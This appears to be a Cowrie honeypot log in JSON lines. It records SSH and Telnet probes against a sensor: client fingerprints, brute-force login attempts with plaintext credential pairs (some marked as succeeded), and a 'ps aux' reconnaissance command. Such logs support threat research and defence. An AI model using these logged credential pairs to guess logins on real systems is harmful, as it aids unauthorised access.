{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:13:08.338704Z","src_ip":"212.227.125.160","session":"9e46d0144c6e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T07:13:12.780431Z","src_ip":"212.227.235.229","session":"1557cc27bf10"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:13:13.952239Z","src_ip":"212.227.235.229","session":"1557cc27bf10"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54923,"dst_ip":"1.2.3.4","dst_port":22,"session":"50a8ab1bb991","protocol":"ssh","message":"New connection: 212.227.235.229:54923 (1.2.3.4:22) [session: 50a8ab1bb991]","sensor":"my-vps","timestamp":"2025-08-31T07:13:14.119512Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:13:14.264761Z","src_ip":"212.227.235.229","session":"50a8ab1bb991"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:13:14.431474Z","src_ip":"212.227.235.229","session":"50a8ab1bb991"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46714,"dst_ip":"1.2.3.4","dst_port":22,"session":"49220922439e","protocol":"ssh","message":"New connection: 212.227.125.160:46714 (1.2.3.4:22) [session: 49220922439e]","sensor":"my-vps","timestamp":"2025-08-31T07:13:14.511944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:13:15.034705Z","src_ip":"212.227.125.160","session":"49220922439e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:13:15.139534Z","src_ip":"212.227.125.160","session":"49220922439e"}
{"eventid":"cowrie.login.success","username":"root","password":"approve2021","message":"login attempt [root/approve2021] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:13:16.128618Z","src_ip":"212.227.125.160","session":"9e46d0144c6e"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"12345","message":"login attempt [zabbix/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T07:13:17.451186Z","src_ip":"212.227.125.160","session":"49220922439e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59878,"dst_ip":"1.2.3.4","dst_port":23,"session":"390379090bf4","protocol":"telnet","message":"New connection: 212.227.125.160:59878 (1.2.3.4:23) [session: 390379090bf4]","sensor":"my-vps","timestamp":"2025-08-31T07:13:17.742901Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 212.227.125.160:23","message":"login attempt [GET / HTTP/1.1/Host: 212.227.125.160:23] failed","sensor":"my-vps","timestamp":"2025-08-31T07:13:17.745304Z","src_ip":"212.227.125.160","session":"390379090bf4"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-08-31T07:13:17.746297Z","src_ip":"212.227.125.160","session":"390379090bf4"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-08-31T07:13:17.747239Z","src_ip":"212.227.125.160","session":"390379090bf4"}
{"eventid":"cowrie.session.closed","duration":0.15474581718444824,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:13:17.897578Z","src_ip":"212.227.125.160","session":"390379090bf4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:13:18.409491Z","src_ip":"212.227.125.160","session":"9e46d0144c6e"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-31T07:13:18.410229Z","src_ip":"212.227.125.160","session":"9e46d0144c6e"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:13:19.054955Z","src_ip":"212.227.125.160","session":"49220922439e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"0.9","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:13:19.307026Z","src_ip":"212.227.125.160","session":"9e46d0144c6e"}
{"eventid":"cowrie.session.closed","duration":"12.2","message":"Connection lost after 12.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:13:19.308124Z","src_ip":"212.227.125.160","session":"9e46d0144c6e"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":55588,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b303c1c8738","protocol":"ssh","message":"New connection: 201.148.180.50:55588 (1.2.3.4:22) [session: 4b303c1c8738]","sensor":"my-vps","timestamp":"2025-08-31T07:13:24.574101Z"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:13:25.473273Z","src_ip":"212.227.235.229","session":"50a8ab1bb991"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:13:25.817840Z","src_ip":"201.148.180.50","session":"4b303c1c8738"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:13:25.819160Z","src_ip":"201.148.180.50","session":"4b303c1c8738"}
{"eventid":"cowrie.session.closed","duration":"27.4","message":"Connection lost after 27.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:13:26.159211Z","src_ip":"212.227.235.229","session":"7a34d209b394"}
{"eventid":"cowrie.session.closed","duration":"12.0","message":"Connection lost after 12.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:13:26.160539Z","src_ip":"212.227.235.229","session":"50a8ab1bb991"}
{"eventid":"cowrie.login.success","username":"root","password":"approve2021","message":"login attempt [root/approve2021] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:13:32.673052Z","src_ip":"201.148.180.50","session":"4b303c1c8738"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:13:35.965373Z","src_ip":"201.148.180.50","session":"4b303c1c8738"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-31T07:13:35.966081Z","src_ip":"201.148.180.50","session":"4b303c1c8738"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:13:37.503372Z","src_ip":"201.148.180.50","session":"4b303c1c8738"}
{"eventid":"cowrie.session.closed","duration":"12.9","message":"Connection lost after 12.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:13:37.504463Z","src_ip":"201.148.180.50","session":"4b303c1c8738"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34228,"dst_ip":"1.2.3.4","dst_port":22,"session":"886a31791d9e","protocol":"ssh","message":"New connection: 212.227.235.229:34228 (1.2.3.4:22) [session: 886a31791d9e]","sensor":"my-vps","timestamp":"2025-08-31T07:13:52.118749Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:13:52.783025Z","src_ip":"212.227.235.229","session":"886a31791d9e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:13:52.783671Z","src_ip":"212.227.235.229","session":"886a31791d9e"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"1234567","message":"login attempt [zabbix/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T07:13:58.987722Z","src_ip":"212.227.235.229","session":"886a31791d9e"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:14:00.794788Z","src_ip":"212.227.235.229","session":"886a31791d9e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53038,"dst_ip":"1.2.3.4","dst_port":22,"session":"df3fea6bf47e","protocol":"ssh","message":"New connection: 212.227.125.160:53038 (1.2.3.4:22) [session: df3fea6bf47e]","sensor":"my-vps","timestamp":"2025-08-31T07:14:12.655256Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:14:13.244652Z","src_ip":"212.227.125.160","session":"df3fea6bf47e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:14:13.264325Z","src_ip":"212.227.125.160","session":"df3fea6bf47e"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":53936,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2c013dfedf8","protocol":"ssh","message":"New connection: 102.210.148.92:53936 (1.2.3.4:22) [session: e2c013dfedf8]","sensor":"my-vps","timestamp":"2025-08-31T07:14:14.895038Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:14:14.895797Z","src_ip":"102.210.148.92","session":"e2c013dfedf8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:14:15.072414Z","src_ip":"102.210.148.92","session":"e2c013dfedf8"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"1234567","message":"login attempt [zabbix/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T07:14:15.577088Z","src_ip":"212.227.125.160","session":"df3fea6bf47e"}
{"eventid":"cowrie.login.failed","username":"username","password":"1q2w3e4r!","message":"login attempt [username/1q2w3e4r!] failed","sensor":"my-vps","timestamp":"2025-08-31T07:14:15.819877Z","src_ip":"102.210.148.92","session":"e2c013dfedf8"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:14:16.998429Z","src_ip":"102.210.148.92","session":"e2c013dfedf8"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:14:17.021795Z","src_ip":"212.227.125.160","session":"df3fea6bf47e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60572,"dst_ip":"1.2.3.4","dst_port":23,"session":"9250613e6fc7","protocol":"telnet","message":"New connection: 212.227.235.229:60572 (1.2.3.4:23) [session: 9250613e6fc7]","sensor":"my-vps","timestamp":"2025-08-31T07:14:25.889711Z"}
{"eventid":"cowrie.session.closed","duration":0.0013353824615478516,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:14:25.890971Z","src_ip":"212.227.235.229","session":"9250613e6fc7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37990,"dst_ip":"1.2.3.4","dst_port":23,"session":"2a21c529dc79","protocol":"telnet","message":"New connection: 212.227.125.160:37990 (1.2.3.4:23) [session: 2a21c529dc79]","sensor":"my-vps","timestamp":"2025-08-31T07:14:41.415597Z"}
{"eventid":"cowrie.session.closed","duration":0.0012526512145996094,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:14:41.416761Z","src_ip":"212.227.125.160","session":"2a21c529dc79"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40934,"dst_ip":"1.2.3.4","dst_port":22,"session":"2159c7d271a2","protocol":"ssh","message":"New connection: 212.227.235.229:40934 (1.2.3.4:22) [session: 2159c7d271a2]","sensor":"my-vps","timestamp":"2025-08-31T07:14:49.545481Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:14:50.853357Z","src_ip":"212.227.235.229","session":"2159c7d271a2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:14:50.854121Z","src_ip":"212.227.235.229","session":"2159c7d271a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48700,"dst_ip":"1.2.3.4","dst_port":23,"session":"c02fb2332ce3","protocol":"telnet","message":"New connection: 212.227.125.160:48700 (1.2.3.4:23) [session: c02fb2332ce3]","sensor":"my-vps","timestamp":"2025-08-31T07:14:51.723596Z"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"12345678","message":"login attempt [zabbix/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T07:14:56.381888Z","src_ip":"212.227.235.229","session":"2159c7d271a2"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:14:58.250184Z","src_ip":"212.227.235.229","session":"2159c7d271a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58846,"dst_ip":"1.2.3.4","dst_port":22,"session":"49db4f378810","protocol":"ssh","message":"New connection: 212.227.125.160:58846 (1.2.3.4:22) [session: 49db4f378810]","sensor":"my-vps","timestamp":"2025-08-31T07:15:10.691989Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:15:11.075927Z","src_ip":"212.227.125.160","session":"49db4f378810"}
